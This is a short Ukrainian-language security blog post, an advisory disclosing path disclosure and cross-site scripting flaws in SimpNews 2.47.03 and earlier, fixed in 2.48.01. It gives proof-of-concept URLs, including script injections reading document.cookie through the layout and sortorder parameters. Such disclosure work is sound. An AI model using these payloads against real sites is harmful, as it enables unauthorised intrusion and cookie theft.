Websecurity - Веб безпека

29.05.2010

У жовтні, 26.10.2009, я знайшов Full path disclosure та Cross-Site Scripting уразливості в SimpNews. Дані уразливості я виявив на www.boesch-it.de - офіційному сайті веб додатку. Про що найближчим часом повідомлю розробникам. Які також є розробниками SimpGB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

09.07.2010

Full path disclosure:

http://site/simpnews/news.php?lang=1&layout=layout2&sortorder=0&category=1

XSS:

http://site/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі SimpNews V2.47.03 та попередні версії. В версії SimpNews V2.48.01 дані уразливості були виправлені.

This entry was posted on 15:04 09.07.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.